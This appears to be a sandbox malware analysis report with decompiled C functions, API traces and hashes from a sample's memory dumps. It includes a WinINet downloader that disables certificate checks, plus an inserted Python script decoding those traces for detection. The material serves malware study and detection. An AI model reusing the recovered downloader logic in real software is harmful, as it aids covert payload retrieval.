                                              					 *(_t171 + 8) = _t173;
                                              					 *_t157 = _t173;
                                              					_t158 =  &(_t157[0]);
                                              					 *_t158 = _t173;
                                              					_t159 =  &(_t158[0]);
                                              					_t88 = L"License Agreement";
                                              					_t142 = _t159 - _t88;
                                              					do {
                                              						_t128 =  *_t88 & 0x0000ffff;
                                              						 *(_t142 + _t88) = _t128;
                                              						_t88 =  &(_t88[1]);
                                              					} while (_t128 != _t173);
                                              					_t160 =  &(_t159[9]);
                                              					 *_t160 = 8;
                                              					_t161 =  &(_t160[0]);
                                              					_t89 = L"MS Shell Dlg";
                                              					_t144 = _t161 - _t89;
                                              					do {
                                              						_t129 =  *_t89 & 0x0000ffff;
                                              						 *(_t144 + _t89) = _t129;
                                              						_t89 =  &(_t89[1]);
                                              					} while (_t129 != _t173);
                                              					_t19 =  &(_t161[7]); // 0x5
                                              					_t91 = _t19 & 0xfffffffc;
                                              					 *((short*)(_t91 + 8)) = 7;
                                              					 *((short*)(_t91 + 0xa)) = 3;
                                              					 *((short*)(_t91 + 0xc)) = 0x12a;
                                              					 *((short*)(_t91 + 0x10)) = 0x1f6;
                                              					 *_t91 = 0x50000000;
                                              					_push(_t122);
                                              					 *((short*)(_t91 + 0xe)) = 0xe;
                                              					_t92 = _t91 + 0x12;
                                              					 *_t92 = 0xffff;
                                              					_t93 = _t92 + 2;
                                              					 *_t93 = 0x82;
                                              					_t94 = _t93 + 2;
                                              					_t130 = L"You can also use the /accepteula command-line switch to accept the EULA.";
                                              					_t146 = _t94 - _t130;
                                              					do {
                                              						_t162 =  *_t130 & 0x0000ffff;
                                              						 *(_t146 + _t130) = _t162;
                                              						_t130 =  &(_t130[1]);
                                              					} while (_t162 != _t173);
                                              					 *(_t94 + 0x92) = _t173;
                                              					_t97 = _t94 + 0x97 & 0xfffffffc;
                                              					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                              					 *((short*)(_t97 + 0x10)) = 1;
                                              					 *((short*)(_t97 + 8)) = 0xc9;
                                              					 *((short*)(_t97 + 0xa)) = 0x9f;
                                              					 *((short*)(_t97 + 0xe)) = 0xe;
                                              					 *_t97 = 0x50010000;
                                              					 *((short*)(_t97 + 0xc)) = 0x32;
                                              					_t98 = _t97 + 0x12;
                                              					 *_t98 = 0xffff;
                                              					_t99 = _t98 + 2;
                                              					 *_t99 = 0x80;
                                              					_t100 = _t99 + 2;
                                              					_t132 = L"&Agree";
                                              					_t148 = _t100 - _t132;
                                              					do {
                                              						_t163 =  *_t132 & 0x0000ffff;
                                              						 *(_t148 + _t132) = _t163;
                                              						_t132 =  &(_t132[1]);
                                              					} while (_t163 != 0);
                                              					 *(_t100 + 0xe) = _t163;
                                              					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                              					_t103 = _t100 + 0x13 & 0xfffffffc;
                                              					 *((short*)(_t103 + 8)) = 0xff;
                                              					 *((short*)(_t103 + 0xa)) = 0x9f;
                                              					 *((short*)(_t103 + 0xc)) = 0x32;
                                              					 *((short*)(_t103 + 0xe)) = 0xe;
                                              					 *((short*)(_t103 + 0x10)) = 2;
                                              					 *_t103 = 0x50010000;
                                              					_t104 = _t103 + 0x12;
                                              					 *_t104 = 0xffff;
                                              					_t105 = _t104 + 2;
                                              					 *_t105 = 0x80;
                                              					_t106 = _t105 + 2;
                                              					_t133 = L"&Decline";
                                              					_t150 = _t106 - _t133;
                                              					do {
                                              						_t164 =  *_t133 & 0x0000ffff;
                                              						 *(_t150 + _t133) = _t164;
                                              						_t133 =  &(_t133[1]);
                                              					} while (_t164 != 0);
                                              					 *(_t106 + 0x12) = _t164;
                                              					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                              					_t109 = _t106 + 0x17 & 0xfffffffc;
                                              					 *((short*)(_t109 + 8)) = 7;
                                              					 *((short*)(_t109 + 0xa)) = 0x9f;
                                              					 *((short*)(_t109 + 0xc)) = 0x32;
                                              					 *((short*)(_t109 + 0xe)) = 0xe;
                                              					 *((short*)(_t109 + 0x10)) = 0x1f5;
                                              					 *_t109 = 0x50010000;
                                              					_t110 = _t109 + 0x12;
                                              					 *_t110 = 0xffff;
                                              					_t111 = _t110 + 2;
                                              					 *_t111 = 0x80;
                                              					_t112 = _t111 + 2;
                                              					_t134 = L"&Print";
                                              					_t152 = _t112 - _t134;
                                              					do {
                                              						_t165 =  *_t134 & 0x0000ffff;
                                              						 *(_t152 + _t134) = _t165;
                                              						_t134 =  &(_t134[1]);
                                              					} while (_t165 != 0);
                                              					 *(_t112 + 0xe) = _t165;
                                              					_t115 = _t112 + 0x13 & 0xfffffffc;
                                              					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                              					_t56 = _t115 + 0x12; // -249
                                              					_t153 = _t56;
                                              					 *((short*)(_t115 + 0xa)) = 0xe;
                                              					 *((short*)(_t115 + 8)) = 7;
                                              					 *((short*)(_t115 + 0xc)) = 0x12a;
                                              					 *((short*)(_t115 + 0xe)) = 0x8c;
                                              					 *((short*)(_t115 + 0x10)) = 0x1f4;
                                              					 *_t115 = 0x50a11844;
                                              					_t116 = L"RICHEDIT";
                                              					_t136 = _t153 - _t116;
                                              					_pop(_t122);
                                              					do {
                                              						_t166 =  *_t116 & 0x0000ffff;
                                              						 *(_t136 + _t116) = _t166;
                                              						_t116 =  &(_t116[1]);
                                              					} while (_t166 != 0);
                                              					_t154 = _t153 + 0x12;
                                              					_t117 = L"&Decline";
                                              					_t168 = _t154 - _t117;
                                              					do {
                                              						_t137 =  *_t117 & 0x0000ffff;
                                              						 *(_t168 + _t117) = _t137;
                                              						_t117 =  &(_t117[1]);
                                              					} while (_t137 != 0);
                                              					 *(_t154 + 0x12) = _t137;
                                              					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                              					_v0 = DialogBoxIndirectParamW(0, _t171, 0, E00401310, L"ShellRunas - Sysinternals: www.sysinternals.com");
                                              					LocalFree(_t171);
                                              					_t173 = 0;
                                              					_pop(_t170);
                                              					if(_v0 != 0) {
                                              						goto L20;
                                              					}
                                              				}
                                              				RegCloseKey(_v532);
                                              				_t85 = 0 | _a4 != _t173;
                                              				E0040318A(_t85, _t122, _v4 ^ _t178, _t170);
                                              				return _t85;
                                              			}

                                              APIs
                                              • __swprintf.LIBCMT ref: 0040149A
                                              • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 004014B1
                                              • RegQueryValueExW.ADVAPI32 ref: 004014DC
                                              • LocalAlloc.KERNEL32(00000040,000003E8,?,?,?,?,00000000), ref: 004014F8
                                              • LoadLibraryW.KERNEL32(Riched32.dll,?,?,?,00000000), ref: 00401508
                                              • DialogBoxIndirectParamW.USER32 ref: 00401786
                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000), ref: 00401794
                                              • RegSetValueExW.ADVAPI32(?,EulaAccepted,00000000,00000004,?,00000004,?,?,00000000), ref: 004017BE
                                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004017C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: LocalValue$AllocCloseCreateDialogFreeIndirectLibraryLoadParamQuery__swprintf
                                              • String ID: &Agree$&Decline$&Print$EulaAccepted$License Agreement$MS Shell Dlg$RICHEDIT$Riched32.dll$ShellRunas - Sysinternals: www.sysinternals.com$Software\Sysinternals\%s$You can also use the /accepteula command-line switch to accept the EULA.
                                              • API String ID: 1839599301-707968945
                                              • Opcode ID: f4e69aa77bff61b704e8fbccd0d93f2c3052f5bef0e29b2b67b4d8038d72d3e8
                                              • Instruction ID: 154b2d0257e82f6b0cd4e7c6326ce2309e60fd29fcbd71df3831e51aaf4186b5
                                              • Opcode Fuzzy Hash: f4e69aa77bff61b704e8fbccd0d93f2c3052f5bef0e29b2b67b4d8038d72d3e8
                                              • Instruction Fuzzy Hash: C7919CB29603008BC3218F24C81AB92B3B0FF95314F5A955DE5899F3B2F7B8C585C75A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 63%
                                              			E004019F0(void* __ebx, short* __ecx, short* _a4) {
                                              				signed int _v4;
                                              				short _v1044;
                                              				short _v1564;
                                              				void* _v1568;
                                              				void* _v1572;
                                              				void* _v1576;
                                              				void* _v1580;
                                              				void* _v1584;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t28;
                                              				int _t31;
                                              				short* _t37;
                                              				int* _t38;
                                              				struct HINSTANCE__* _t42;
                                              				intOrPtr* _t47;
                                              				void* _t54;
                                              				intOrPtr _t63;
                                              				void* _t74;
                                              				short* _t80;
                                              				void* _t81;
                                              				int _t82;
                                              				signed int _t86;
                                              
                                              				_t54 = __ebx;
                                              				_t86 =  &_v1584;
                                              				_t28 =  *0x413004; // 0x98fc836b
                                              				_v4 = _t28 ^ _t86;
                                              				_t80 = __ecx;
                                              				_t31 = RegCreateKeyExW(0x80000001, _a4, 0, 0, 0, 4, 0,  &_v1576, 0);
                                              				if(_t31 == 0) {
                                              					_t82 = RegCreateKeyExW(_v1576, _t80, _t31, _t31, _t31, 4, _t31,  &_v1584, _t31);
                                              					if(_t82 == 0) {
                                              						_t82 = RegCreateKeyExW(_v1584, L"Shell", 0, 0, 0, 4, 0,  &_v1572, 0);
                                              						if(_t82 == 0) {
                                              							_t37 = L"Run as different user (netonly)...";
                                              							if(__ebx == 0) {
                                              								_t37 = L"Run as different user...";
                                              							}
                                              							_t38 = RegCreateKeyExW(_v1572, _t37, 0, 0, 0, 4, 0,  &_v1568, 0);
                                              							_t82 = _t38;
                                              							if(_t82 == 0) {
                                              								_t42 = RegCreateKeyExW(_v1568, L"Command", _t82, _t82, _t82, 6, _t82,  &_v1580, _t38);
                                              								_t82 = _t42;
                                              								if(_t82 == 0) {
                                              									GetModuleFileNameW(_t42,  &_v1564, 0x104);
                                              									if(_t54 == 0) {
                                              										_push( &_v1564);
                                              										_push(L"\"%s\" \"%%1\" %%*");
                                              										_push(0x208);
                                              										_push( &_v1044);
                                              									} else {
                                              										_push( &_v1564);
                                              										_push(L"\"%s\" /netonly \"%%1\" %%*");
                                              										_push(0x208);
                                              										_push( &_v1044);
                                              									}
                                              									E004032BD();
                                              									_t47 =  &_v1044;
                                              									_t86 = _t86 + 0x10;
                                              									_t74 = _t47 + 2;
                                              									do {
                                              										_t63 =  *_t47;
                                              										_t47 = _t47 + 2;
                                              									} while (_t63 != 0);
                                              									_t82 = RegSetValueW(_v1580, 0, 1,  &_v1044, (_t47 - _t74 >> 1) + (_t47 - _t74 >> 1));
                                              									RegCloseKey(_v1580);
                                              								}
                                              								RegCloseKey(_v1568);
                                              							}
                                              							RegCloseKey(_v1572);
                                              						}
                                              						RegCloseKey(_v1584);
                                              					}
                                              					RegCloseKey(_v1576);
                                              					_t31 = _t82;
                                              				}
                                              				_pop(_t81);
                                              				E0040318A(_t31, _t54, _v4 ^ _t86, _t81);
                                              				return _t31;
                                              			}

                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000004,00000000,?,00000000,?), ref: 00401A2C
                                              • RegCreateKeyExW.ADVAPI32(?,.exe,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A49
                                              • RegCreateKeyExW.ADVAPI32(?,Shell,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A76
                                              • RegCreateKeyExW.ADVAPI32(?,Run as different user (netonly)...,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401AA7
                                              • RegCreateKeyExW.ADVAPI32(?,Command,00000000,00000000,00000000,00000006,00000000,?,00000000), ref: 00401AC9
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401AE0
                                              • _swprintf.LIBCMT ref: 00401B1A
                                              • RegSetValueW.ADVAPI32(?,00000000,00000001,?), ref: 00401B54
                                              • RegCloseKey.ADVAPI32(?), ref: 00401B61
                                              • RegCloseKey.ADVAPI32(?), ref: 00401B68
                                              • RegCloseKey.ADVAPI32(?), ref: 00401B6F
                                              • RegCloseKey.ADVAPI32(?), ref: 00401B76
                                              • RegCloseKey.ADVAPI32(?), ref: 00401B7D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: CloseCreate$FileModuleNameValue_swprintf
                                              • String ID: "%s" "%%1" %%*$"%s" /netonly "%%1" %%*$.exe$Command$Run as different user (netonly)...$Run as different user...$Shell
                                              • API String ID: 2816765105-3583415818
                                              • Opcode ID: fd094dcd363d27c0bf250ac2475080b10ccc28c413ec764f82221b39573ebeb1
                                              • Instruction ID: 96684db5b3ddf41ef19364bd1cce9cce62b50f6402ace901a6fc09d749ff9c79
                                              • Opcode Fuzzy Hash: fd094dcd363d27c0bf250ac2475080b10ccc28c413ec764f82221b39573ebeb1
                                              • Instruction Fuzzy Hash: 6A416E726443017BE320DB64CC46FABB7ACABC8B54F40491DB744AB2D0DAB4F90487A9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 98%
                                              			E02B51E51(void* __ebx, WCHAR* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                              				signed int _v8;
                                              				short _v136;
                                              				short _v392;
                                              				short _v648;
                                              				short _v1160;
                                              				short _v5328;
                                              				char _v9496;
                                              				long _v9500;
                                              				void* _v9504;
                                              				long _v9508;
                                              				void _v9512;
                                              				long _v9516;
                                              				long _v9520;
                                              				intOrPtr _v9532;
                                              				WCHAR* _v9536;
                                              				intOrPtr _v9540;
                                              				WCHAR* _v9544;
                                              				intOrPtr _v9548;
                                              				WCHAR* _v9552;
                                              				short _v9556;
                                              				intOrPtr _v9560;
                                              				WCHAR* _v9564;
                                              				intOrPtr _v9568;
                                              				void* _v9580;
                                              				signed int _t63;
                                              				void* _t73;
                                              				void* _t74;
                                              				void* _t81;
                                              				LPCWSTR* _t86;
                                              				long _t100;
                                              				intOrPtr* _t106;
                                              				intOrPtr _t112;
                                              				WCHAR* _t119;
                                              				WCHAR* _t123;
                                              				void* _t125;
                                              				void* _t127;
                                              				void* _t130;
                                              				WCHAR* _t132;
                                              				signed int _t136;
                                              
                                              				E02B53F00();
                                              				_t63 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t63 ^ _t136;
                                              				_t106 = _a4;
                                              				_t132 = __ecx;
                                              				_v9504 = __edx;
                                              				_t125 = 0x3c;
                                              				_v1160 = 0;
                                              				_v648 = 0;
                                              				_v392 = 0;
                                              				_v9496 = 0;
                                              				_v5328 = 0;
                                              				E02B52CE7(0,  &_v9580, _t125);
                                              				_v9580 = _t125;
                                              				_v9564 =  &_v1160;
                                              				_v9552 =  &_v648;
                                              				_v9544 =  &_v392;
                                              				_t17 = _t125 + 0x44; // 0x80
                                              				_t112 = _t17;
                                              				_v9548 = _t112;
                                              				_v9536 =  &_v9496;
                                              				_v9540 = _t112;
                                              				_v9560 = 0x100;
                                              				_v9532 = 0x824;
                                              				_v9520 = 0;
                                              				_v9516 = 0;
                                              				if(InternetCrackUrlW(_t132, 0, 0,  &_v9580) == 0 || _v9568 != 3 && _v9568 != 4) {
                                              					_t133 = 0;
                                              					goto L15;
                                              				} else {
                                              					_t129 =  ==  ? 0x80803000 : 0x80000000;
                                              					_t133 = 0;
                                              					_v9508 =  ==  ? 0x80803000 : 0x80000000;
                                              					_t81 = InternetOpenW(L"Chrome", 0, 0, 0, 0);
                                              					_v9520 = _t81;
                                              					if(_t81 == 0) {
                                              						L15:
                                              						_t127 = _v9504;
                                              					} else {
                                              						_t130 = InternetConnectW(_t81,  &_v1160, _v9556,  &_v648,  &_v392, 3, 0, 0);
                                              						_v9516 = _t130;
                                              						if(_t130 == 0) {
                                              							goto L15;
                                              						} else {
                                              							_t119 =  &_v5328;
                                              							_t123 = _v9536;
                                              							if(_v9532 == 0) {
                                              								_t123 = "/";
                                              							}
                                              							E02B52C9C(_t119, _t123);
                                              							_t86 = E02B514D8(HttpOpenRequestW(_t130, L"HEAD",  &_v5328, L"HTTP/1.1", 0x2b542bc, _t133, _v9508, _t133));
                                              							_t133 = _t86;
                                              							if(_t86 == 0) {
                                              								goto L15;
                                              							} else {
                                              								_t127 = HttpOpenRequestW(_t130, L"GET",  &_v5328, L"HTTP/1.1", 0x2b542bc, 0, _v9508, 0);
                                              								_v9512 = 0x2bf20;
                                              								InternetSetOptionW(_t127, 5,  &_v9512, 4);
                                              								InternetSetOptionW(_t127, 6,  &_v9512, 4);
                                              								_t133 = 0;
                                              								wsprintfW( &_v136, L"RANGE:bytes=%d-%d\r\n\r\n", 0, 0x200000);
                                              								if(HttpAddRequestHeadersW(_t127,  &_v136, 0xffffffff, 0xa0000000) != 0 && E02B514D8(_t127) != 0) {
                                              									 *_t106 = 0;
                                              									_v9500 = 0;
                                              									_t133 = InternetReadFile(_t127, _v9504, 0x200000,  &_v9500);
                                              									_t100 = _v9500;
                                              									while(1) {
                                              										 *_t106 =  *_t106 + _t100;
                                              										_v9500 = _v9500 & 0x00000000;
                                              										if(InternetReadFile(_t127,  *_t106 + _v9504, 0x200000,  &_v9500) == 0) {
                                              											break;
                                              										}
                                              										_t100 = _v9500;
                                              										if(_t100 != 0) {
                                              											continue;
                                              										}
                                              										goto L16;
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              				}
                                              				L16:
                                              				if(_t127 != 0) {
                                              					InternetCloseHandle(_t127);
                                              				}
                                              				_t73 = _v9516;
                                              				if(_t73 != 0) {
                                              					InternetCloseHandle(_t73);
                                              				}
                                              				_t74 = _v9520;
                                              				if(_t74 != 0) {
                                              					InternetCloseHandle(_t74);
                                              				}
                                              				return E02B53C33(_v8 ^ _t136);
                                              			}

                                              APIs
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 02B51F21
                                              • InternetOpenW.WININET(Chrome,00000000,00000000,00000000,00000000), ref: 02B51F65
                                              • InternetConnectW.WININET(00000000,?,?,?,?,00000003,00000000,00000000), ref: 02B51F99
                                              • HttpOpenRequestW.WININET(00000000,HEAD,?,HTTP/1.1,02B542BC,00000000,?,00000000), ref: 02B51FEC
                                              • HttpOpenRequestW.WININET(00000000,GET,?,HTTP/1.1,02B542BC,00000000,?,00000000), ref: 02B52024
                                              • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 02B52048
                                              • InternetSetOptionW.WININET(00000000,00000006,0002BF20,00000004), ref: 02B52056
                                              • wsprintfW.USER32 ref: 02B5206C
                                              • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,A0000000), ref: 02B52084
                                              • InternetReadFile.WININET(00000000,?,00200000,?), ref: 02B520B4
                                              • InternetReadFile.WININET(00000000,?,00200000,?), ref: 02B520ED
                                              • InternetCloseHandle.WININET(?), ref: 02B5210C
                                              • InternetCloseHandle.WININET(?), ref: 02B52119
                                              • InternetCloseHandle.WININET(?), ref: 02B52126
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
• Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Internet$CloseHandleHttpOpenRequest$FileOptionRead$ConnectCrackHeaderswsprintf
                                              • String ID: Chrome$GET$HEAD$HTTP/1.1$RANGE:bytes=%d-%d
                                              • API String ID: 4118762141-3869934866
                                              • Opcode ID: 2f081c35ce287324ec70b487f6287b97d1f4efeb2ee54161e5e9e299d1b3be2e
                                              • Instruction ID: e1e8a25234caeff5c0fbdc1371093facd1f167fe6724d8f740674b39965c3d8d
                                              • Opcode Fuzzy Hash: 2f081c35ce287324ec70b487f6287b97d1f4efeb2ee54161e5e9e299d1b3be2e
                                              • Instruction Fuzzy Hash: 0F815F719416399BDB35DF15CC99BAABBB8EF09752F0000DAE909A7240DB309AC4CF58
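
The API trace above records the WinINet arguments as raw hex, and the decompilation shows the request flags only as the two constants 0x80803000 and 0x80000000. The following is an added example, not code from the sample or from Joe Sandbox: it parses trace lines in the format used on this page and names the WinINet constants behind the values, so the download routine's behaviour (User-Agent string, send/receive timeouts, TLS certificate handling, read buffer size) can be read off directly. The trace lines embedded in the block are constructed copies of the ones listed above; the HTTPS flag value is taken from the decompiled `_v9508` assignment; the constant names come from `<wininet.h>`.

```python
"""Decode the WinINet arguments recorded in a Joe Sandbox API trace.

Added example for this report (not the sample's code). Constants are the
public <wininet.h> values; the trace lines at the bottom are constructed
copies of the ones in the report above.
"""
import re

# Option IDs passed to InternetSetOption (values are milliseconds).
INTERNET_OPTIONS = {
    2: "INTERNET_OPTION_CONNECT_TIMEOUT",
    5: "INTERNET_OPTION_SEND_TIMEOUT",
    6: "INTERNET_OPTION_RECEIVE_TIMEOUT",
}
# dwFlags of HttpOpenRequest.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
}
# dwModifiers of HttpAddRequestHeaders.
HTTP_ADDREQ_FLAGS = {
    0x80000000: "HTTP_ADDREQ_FLAG_REPLACE",
    0x20000000: "HTTP_ADDREQ_FLAG_ADD",
}
INTERNET_SERVICES = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}

# "• Api.MODULE(arg,arg,...), ref: 02B5xxxx"
API_LINE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")

def parse_api_line(line):
    """Return {'api','module','args','ref'} for one trace line, else None."""
    m = API_LINE.search(line)
    if not m:
        return None
    api, module, args, ref = m.groups()
    return {"api": api, "module": module, "ref": ref,
            "args": [a.strip() for a in args.split(",")] if args else []}

def as_int(arg):
    """Trace arguments are 8 hex digits when known at capture time, '?' otherwise."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None

def decode_flags(value, table):
    """Split a bit mask into named flags, high bit first; unknown bits stay hex."""
    names, rest = [], value
    for bit, name in sorted(table.items(), reverse=True):
        if rest & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))
    return names

def cert_checks_disabled(open_request_flags):
    """True when the request ignores certificate name and/or date errors."""
    return bool(open_request_flags & 0x00003000)

def describe_call(call):
    """One readable line for each WinINet call that shapes the download."""
    api, a = call["api"], call["args"]
    if api == "InternetOpenW":
        return f"user agent {a[0]!r}"
    if api == "InternetConnectW":
        svc = as_int(a[5])
        return f"service {INTERNET_SERVICES.get(svc, svc)}"
    if api == "InternetSetOptionW":
        opt, val = as_int(a[1]), as_int(a[2])
        name = INTERNET_OPTIONS.get(opt, f"option {opt}")
        return f"{name} = {val} ms" if val is not None else f"{name} (value not in trace)"
    if api == "HttpOpenRequestW":
        flags = as_int(a[6])
        shown = "|".join(decode_flags(flags, INTERNET_FLAGS)) if flags is not None else "runtime value"
        return f"verb {a[1]}, flags {shown}"
    if api == "HttpAddRequestHeadersW":
        return "headers added with " + "|".join(decode_flags(as_int(a[3]), HTTP_ADDREQ_FLAGS))
    if api == "InternetReadFile":
        return f"read buffer {as_int(a[2]) // 1024} KiB"
    return None

def summarize(trace_lines):
    out = []
    for line in trace_lines:
        call = parse_api_line(line)
        if call:
            d = describe_call(call)
            if d:
                out.append(f"{call['ref']} {call['api']}: {d}")
    return out

# Constructed copies of the trace lines in this report.
TRACE = [
    "• InternetOpenW.WININET(Chrome,00000000,00000000,00000000,00000000), ref: 02B51F65",
    "• InternetConnectW.WININET(00000000,?,?,?,?,00000003,00000000,00000000), ref: 02B51F99",
    "• HttpOpenRequestW.WININET(00000000,HEAD,?,HTTP/1.1,02B542BC,00000000,?,00000000), ref: 02B51FEC",
    "• InternetSetOptionW.WININET(00000000,00000006,0002BF20,00000004), ref: 02B52056",
    "• HttpAddRequestHeadersW.WININET(00000000,?,000000FF,A0000000), ref: 02B52084",
    "• InternetReadFile.WININET(00000000,?,00200000,?), ref: 02B520B4",
]
# The request flags are '?' in the trace; the decompiled _v9508 assignment shows them.
HTTPS_REQUEST_FLAGS = 0x80803000

if __name__ == "__main__":
    for s in summarize(TRACE):
        print(s)
    print("HTTPS flags:", "|".join(decode_flags(HTTPS_REQUEST_FLAGS, INTERNET_FLAGS)))
    print("certificate checks disabled:", cert_checks_disabled(HTTPS_REQUEST_FLAGS))
```

Read together with the listing, the decoded values say: the loader identifies itself with the bare User-Agent `Chrome`, sets both send and receive timeouts to 180000 ms (option IDs 5 and 6), issues a HEAD and then a GET with `HTTP/1.1`, and on an HTTPS URL combines `INTERNET_FLAG_SECURE` with both `INTERNET_FLAG_IGNORE_CERT_*` flags, so any certificate is accepted. The `RANGE:bytes=0-2097152` header matches the 0x200000-byte `InternetReadFile` buffer. The literal user agent and the header format are the stable strings to key network detections on.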
                                              C-Code - Quality: 91%
                                              			E00406798(void* __ebx) {
                                              				void* __edi;
                                              				void* __esi;
                                              				_Unknown_base(*)()* _t7;
                                              				long _t10;
                                              				void* _t11;
                                              				int _t12;
                                              				void* _t18;
                                              				intOrPtr _t21;
                                              				long _t26;
                                              				struct HINSTANCE__* _t37;
                                              				void* _t40;
                                              				void* _t42;
                                              
                                              				_t30 = __ebx;
                                              				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                              				if(_t37 != 0) {
                                              					 *0x4144f0 = GetProcAddress(_t37, "FlsAlloc");
                                              					 *0x4144f4 = GetProcAddress(_t37, "FlsGetValue");
                                              					 *0x4144f8 = GetProcAddress(_t37, "FlsSetValue");
                                              					_t7 = GetProcAddress(_t37, "FlsFree");
                                              					__eflags =  *0x4144f0;
                                              					_t40 = TlsSetValue;
                                              					 *0x4144fc = _t7;
                                              					if( *0x4144f0 == 0) {
                                              						L6:
                                              						 *0x4144f4 = TlsGetValue;
                                              						 *0x4144f0 = E004064B1;
                                              						 *0x4144f8 = _t40;
                                              						 *0x4144fc = TlsFree;
                                              					} else {
                                              						__eflags =  *0x4144f4;
                                              						if( *0x4144f4 == 0) {
                                              							goto L6;
                                              						} else {
                                              							__eflags =  *0x4144f8;
                                              							if( *0x4144f8 == 0) {
                                              								goto L6;
                                              							} else {
                                              								__eflags = _t7;
                                              								if(_t7 == 0) {
                                              									goto L6;
                                              								}
                                              							}
                                              						}
                                              					}
                                              					_t10 = TlsAlloc();
                                              					__eflags = _t10 - 0xffffffff;
                                              					 *0x4138c4 = _t10;
                                              					if(_t10 == 0xffffffff) {
                                              						L15:
                                              						_t11 = 0;
                                              						__eflags = 0;
                                              					} else {
                                              						_t12 = TlsSetValue(_t10,  *0x4144f4);
                                              						__eflags = _t12;
                                              						if(_t12 == 0) {
                                              							goto L15;
                                              						} else {
                                              							E00406C99();
                                              							 *0x4144f0 = E004063CC( *0x4144f0);
                                              							 *0x4144f4 = E004063CC( *0x4144f4);
                                              							 *0x4144f8 = E004063CC( *0x4144f8);
                                              							 *0x4144fc = E004063CC( *0x4144fc);
                                              							_t18 = E00403DE2(_t30, _t37);
                                              							__eflags = _t18;
                                              							if(_t18 == 0) {
                                              								L14:
                                              								E004064EC(_t30, _t37);
                                              								goto L15;
                                              							} else {
                                              								_push(E00406677);
                                              								_t21 =  *((intOrPtr*)(E00406443( *0x4144f0)))();
                                              								__eflags = _t21 - 0xffffffff;
                                              								 *0x4138c0 = _t21;
                                              								if(_t21 == 0xffffffff) {
                                              									goto L14;
                                              								} else {
                                              									_t42 = E00407C87(1, 0x214);
                                              									__eflags = _t42;
                                              									if(_t42 == 0) {
                                              										goto L14;
                                              									} else {
                                              										_push(_t42);
                                              										_push( *0x4138c0);
                                              										__eflags =  *((intOrPtr*)(E00406443( *0x4144f8)))();
                                              										if(__eflags == 0) {
                                              											goto L14;
                                              										} else {
                                              											_push(0);
                                              											_push(_t42);
                                              											E00406529(_t30, _t37, _t42, __eflags);
                                              											_t26 = GetCurrentThreadId();
                                              											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                              											 *_t42 = _t26;
                                              											_t11 = 1;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              					return _t11;
                                              				} else {
                                              					E004064EC(__ebx, _t37);
                                              					return 0;
                                              				}
                                              			}

                                              APIs
                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00403AA8), ref: 0040679E
                                              • __mtterm.LIBCMT ref: 004067AA
                                                • Part of subcall function 004064EC: TlsFree.KERNEL32(FFFFFFFF,00406917), ref: 00406517
                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004067C0
                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004067CD
                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004067DA
                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004067E7
                                              • TlsAlloc.KERNEL32 ref: 00406837
